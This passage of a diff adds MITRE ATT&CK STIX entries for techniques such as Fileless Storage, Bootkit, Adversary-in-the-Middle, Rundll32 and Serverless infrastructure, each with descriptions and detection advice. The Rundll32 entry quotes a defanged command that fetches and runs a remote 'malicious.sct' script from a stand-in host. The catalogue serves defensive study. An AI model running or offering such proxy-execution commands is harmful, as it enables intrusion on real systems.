"https://attack.mitre.org/techniques/T1113", + "external_id": "T1113" + }, + { + "source_name": "CopyFromScreen .NET", + "description": "Microsoft. (n.d.). Graphics.CopyFromScreen Method. Retrieved March 24, 2020.", + "url": "https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen?view=netframework-4.8" + }, + { + "source_name": "Antiquated Mac Malware", + "description": "Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.", + "url": "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-31T14:00:00.188Z", + "name": "Fileless Storage", + "description": "Adversaries may store data in \"fileless\" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage include the Windows Registry, event logs, or WMI repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless)\n\nSimilar to fileless in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless data storage may remain undetected by anti-virus and other endpoint security tools that can only access specific file formats from disk storage.\n\nAdversaries may use fileless storage to conceal various types of stored data, including payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003)) and collected data not yet exfiltrated from the victim (e.g., [Local Data Staging](https://attack.mitre.org/techniques/T1074/001)). Adversaries also often encrypt, encode, splice, or otherwise obfuscate this fileless data when stored.\n\nSome forms of fileless storage activity may indirectly create artifacts in the file system, but in central and otherwise difficult to inspect formats such as the WMI (e.g., `%SystemRoot%\\System32\\Wbem\\Repository`) or Registry (e.g., `%SystemRoot%\\System32\\Config`) physical files.(Citation: Microsoft Fileless) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Christopher Peacock", + "Denise Tan", + "Mark Wee", + "Simona David", + "Xavier Rousseau" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939", + "created": "2023-03-23T19:55:25.546Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1027/011", + "external_id": "T1027.011" + }, + { + "source_name": "SecureList Fileless", + "description": "Legezo, D. (2022, May 4). A new secret stash for “fileless” malware. Retrieved March 23, 2023.", + "url": "https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/" + }, + { + "source_name": "Microsoft Fileless", + "description": "Microsoft. (2023, February 6). Fileless threats. Retrieved March 23, 2023.", + "url": "https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Bootkit", + "description": "A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: MTrends 2016)\n\nAdversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.\n\n### Master Boot Record\nThe MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)\n\n### Volume Boot Record\nThe MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--02fefddc-fb1b-423f-a76b-7552dd211d4d", + "created": "2017-05-31T21:30:54.661Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1067", + "external_id": "T1067" + }, + { + "source_name": "MTrends 2016", + "description": "Mandiant. (2016, February). M-Trends 2016. Retrieved January 4, 2017.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/regional/fr_FR/offers/pdfs/ig-mtrends-2016.pdf" + }, + { + "source_name": "Lau 2011", + "description": "Lau, H. (2011, August 8). Are MBR Infections Back in Fashion? (Infographic). Retrieved November 13, 2014.", + "url": "http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-16T12:23:13.621Z", + "name": "Boot or Logon Initialization Scripts", + "description": "Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence.(Citation: Mandiant APT29 Eye Spy Email Nov 22)(Citation: Anomali Rocke March 2019) Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely. \n\nAdversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. \n\nAn adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS", + "Windows", + "Linux", + "Network" + ], + "x_mitre_version": "2.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", + "created": "2017-05-31T21:30:38.910Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1037", + "external_id": "T1037" + }, + { + "source_name": "Anomali Rocke March 2019", + "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019.", + "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" + }, + { + "source_name": "Mandiant APT29 Eye Spy Email Nov 22", + "description": "Mandiant. (2022, May 2). UNC3524: Eye Spy on Your Email. Retrieved August 17, 2023.", + "url": "https://www.mandiant.com/resources/blog/unc3524-eye-spy-email" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-18T14:26:21.852Z", + "name": "Adversary-in-the-Middle", + "description": "Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or replay attacks ([Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212)). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)\n\nFor example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.(Citation: ttint_rat)(Citation: dns_changer_trojans)(Citation: ad_blocker_with_miner) Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials, including access tokens ([Steal Application Access Token](https://attack.mitre.org/techniques/T1528)) and session cookies ([Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)).(Citation: volexity_0day_sophos_FW)(Citation: Token tactics) [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.(Citation: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att_tls)(Citation: tlseminar_downgrade_att)\n\nAdversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to [Impair Defenses](https://attack.mitre.org/techniques/T1562) and/or in support of a [Network Denial of Service](https://attack.mitre.org/techniques/T1498).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Mayuresh Dani, Qualys", + "Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project", + "NEC" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor network traffic for anomalies associated with known AiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux", + "Network" + ], + "x_mitre_version": "2.4", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", + "created": "2020-02-11T19:07:12.114Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1557", + "external_id": "T1557" + }, + { + "source_name": "dns_changer_trojans", + "description": "Abendan, O. (2012, June 14). How DNS Changer Trojans Direct Users to Threats. Retrieved October 28, 2021.", + "url": "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/125/how-dns-changer-trojans-direct-users-to-threats" + }, + { + "source_name": "volexity_0day_sophos_FW", + "description": "Adair, S., Lancaster, T., Volexity Threat Research. (2022, June 15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach. Retrieved July 1, 2022.", + "url": "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/" + }, + { + "source_name": "taxonomy_downgrade_att_tls", + "description": "Alashwali, E. S., Rasmussen, K. (2019, January 26). What's in a Downgrade? A Taxonomy of Downgrade Attacks in the TLS Protocol and Application Protocols Using TLS. Retrieved December 7, 2021.", + "url": "https://arxiv.org/abs/1809.05681" + }, + { + "source_name": "ad_blocker_with_miner", + "description": "Kuzmenko, A.. (2021, March 10). Ad blocker with miner included. Retrieved October 28, 2021.", + "url": "https://securelist.com/ad-blocker-with-miner-included/101105/" + }, + { + "source_name": "Token tactics", + "description": "Microsoft Incident Response. (2022, November 16). Token tactics: How to prevent, detect, and respond to cloud token theft. Retrieved December 26, 2023.", + "url": "https://www.microsoft.com/en-us/security/blog/2022/11/16/token-tactics-how-to-prevent-detect-and-respond-to-cloud-token-theft/" + }, + { + "source_name": "mitm_tls_downgrade_att", + "description": "praetorian Editorial Team. (2014, August 19). Man-in-the-Middle TLS Protocol Downgrade Attack. Retrieved December 8, 2021.", + "url": "https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/" + }, + { + "source_name": "Rapid7 MiTM Basics", + "description": "Rapid7. (n.d.). Man-in-the-Middle (MITM) Attacks. Retrieved March 2, 2020.", + "url": "https://www.rapid7.com/fundamentals/man-in-the-middle-attacks/" + }, + { + "source_name": "tlseminar_downgrade_att", + "description": "Team Cinnamon. (2017, February 3). Downgrade Attacks. Retrieved December 9, 2021.", + "url": "https://tlseminar.github.io/downgrade-attacks/" + }, + { + "source_name": "ttint_rat", + "description": "Tu, L. Ma, Y. Ye, G. (2020, October 1). Ttint: An IoT Remote Access Trojan spread through 2 0-day vulnerabilities. Retrieved October 28, 2021.", + "url": "https://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-09-29T19:50:06.736Z", + "name": "System Owner/User Discovery", + "description": "Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nVarious utilities and commands may acquire this information, including whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts. Environment variables, such as %USERNAME% and $USER, may also be used to access this information.\n\nOn network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Austin Clark, @c2defense" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "`System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nFor network infrastructure devices, collect AAA logging to monitor `show` commands being run by non-standard users from non-standard locations.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.5", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", + "created": "2017-05-31T21:30:35.733Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1033", + "external_id": "T1033" + }, + { + "source_name": "show_ssh_users_cmd_cisco", + "description": "Cisco. (2023, March 7). Cisco IOS Security Command Reference: Commands S to Z . Retrieved July 13, 2022.", + "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-s5.html" + }, + { + "source_name": "US-CERT TA18-106A Network Infrastructure Devices 2018", + "description": "US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-106A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-02-28T21:13:02.648Z", + "name": "Acquire Infrastructure", + "description": "Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.\n\nUse of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090), including from residential proxy services.(Citation: amnesty_nso_pegasus)(Citation: FBI Proxies Credential Stuffing)(Citation: Mandiant APT29 Microsoft 365 2022) Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Shailesh Tiwary (Indian Army)", + "Goldstein Menachem" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Consider use of services that may aid in tracking of newly acquired infrastructure, such as WHOIS databases for domain registration information. \n\nOnce adversaries have provisioned infrastructure (ex: a server for use in command and control), internet scans may help proactively discover adversary acquired infrastructure. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2", + "created": "2020-09-30T16:37:40.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1583", + "external_id": "T1583" + }, + { + "source_name": "amnesty_nso_pegasus", + "description": "Amnesty International Security Lab. (2021, July 18). Forensic Methodology Report: How to catch NSO Group’s Pegasus. Retrieved February 22, 2022.", + "url": "https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/" + }, + { + "source_name": "Mandiant APT29 Microsoft 365 2022", + "description": "Douglas Bienstock. (2022, August 18). You Can’t Audit Me: APT29 Continues Targeting Microsoft 365. Retrieved February 23, 2023.", + "url": "https://www.mandiant.com/resources/blog/apt29-continues-targeting-microsoft" + }, + { + "source_name": "FBI Proxies Credential Stuffing", + "description": "FBI. (2022, August 18). Proxies and Configurations Used for Credential Stuffing Attacks on Online Customer Accounts . Retrieved July 6, 2023.", + "url": "https://www.ic3.gov/Media/News/2022/220818.pdf" + }, + { + "source_name": "Free Trial PurpleUrchin", + "description": "Gamazo, William. Quist, Nathaniel.. (2023, January 5). PurpleUrchin Bypasses CAPTCHA and Steals Cloud Platform Resources. Retrieved February 28, 2024.", + "url": "https://unit42.paloaltonetworks.com/purpleurchin-steals-cloud-resources/" + }, + { + "source_name": "Koczwara Beacon Hunting Sep 2021", + "description": "Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.", + "url": "https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2" + }, + { + "source_name": "TrendmicroHideoutsLease", + "description": "Max Goncharov. (2015, July 15). Criminal Hideouts for Lease: Bulletproof Hosting Services. Retrieved March 6, 2017.", + "url": "https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf" + }, + { + "source_name": "Mandiant SCANdalous Jul 2020", + "description": "Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.", + "url": "https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation" + }, + { + "source_name": "ThreatConnect Infrastructure Dec 2020", + "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.", + "url": "https://threatconnect.com/blog/infrastructure-research-hunting/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-08-14T15:35:28.965Z", + "name": "Rundll32", + "description": "Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).\n\nRundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)\n\nAdversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1).\n\nAdditionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Gareth Phillips, Seek Ltd.", + "Casey Smith", + "Ricardo Dias", + "James_inthe_box, Me" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity.\n\nCommand arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded. Analyzing DLL exports and comparing to runtime arguments may be useful in uncovering obfuscated function calls.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.2", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Digital Certificate Validation", + "Application control", + "Anti-virus" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5", + "created": "2020-01-23T18:03:46.248Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1218/011", + "external_id": "T1218.011" + }, + { + "source_name": "rundll32.exe defense evasion", + "description": "Ariel silver. (2022, February 1). Defense Evasion Techniques. Retrieved April 8, 2022.", + "url": "https://www.cynet.com/attack-techniques-hands-on/defense-evasion-techniques/" + }, + { + "source_name": "Attackify Rundll32.exe Obscurity", + "description": "Attackify. (n.d.). Rundll32.exe Obscurity. Retrieved August 23, 2021.", + "url": "https://www.attackify.com/blog/rundll32_execution_order/" + }, + { + "source_name": "This is Security Command Line Confusion", + "description": "B. Ancel. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018.", + "url": "https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/" + }, + { + "source_name": "Github NoRunDll", + "description": "gtworek. (2019, December 17). NoRunDll. Retrieved August 23, 2021.", + "url": "https://github.com/gtworek/PSBits/tree/master/NoRunDll" + }, + { + "source_name": "Trend Micro CPL", + "description": "Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.", + "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Container and Resource Discovery", + "description": "Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.\n\nThese resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs.(Citation: Docker API)(Citation: Kubernetes API) In Docker, logs may leak information about the environment, such as the environment’s configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversary’s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Vishwas Manral, McAfee", + "Center for Threat-Informed Defense (CTID)", + "Yossi Weizman, Azure Defender Research Team" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Establish centralized logging for the activity of container and Kubernetes cluster components. This can be done by deploying logging agents on Kubernetes nodes and retrieving logs from sidecar proxies for application pods to detect malicious activity at the cluster level.\n\nMonitor logs for actions that could be taken to gather information about container infrastructure, including the use of discovery API calls by new or unexpected users. Monitor account activity logs to see actions performed and activity associated with the Kubernetes dashboard and other web applications. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Containers" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--0470e792-32f8-46b0-a351-652bc35e9336", + "created": "2021-03-31T14:26:00.848Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1613", + "external_id": "T1613" + }, + { + "source_name": "Docker API", + "description": "Docker. (n.d.). Docker Engine API v1.41 Reference. Retrieved March 31, 2021.", + "url": "https://docs.docker.com/engine/api/v1.41/" + }, + { + "source_name": "Kubernetes API", + "description": "The Kubernetes Authors. (n.d.). The Kubernetes API. Retrieved March 29, 2021.", + "url": "https://kubernetes.io/docs/concepts/overview/kubernetes-api/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-20T21:20:22.578Z", + "name": "Serverless", + "description": "Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.\n\nOnce acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Awake Security" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + 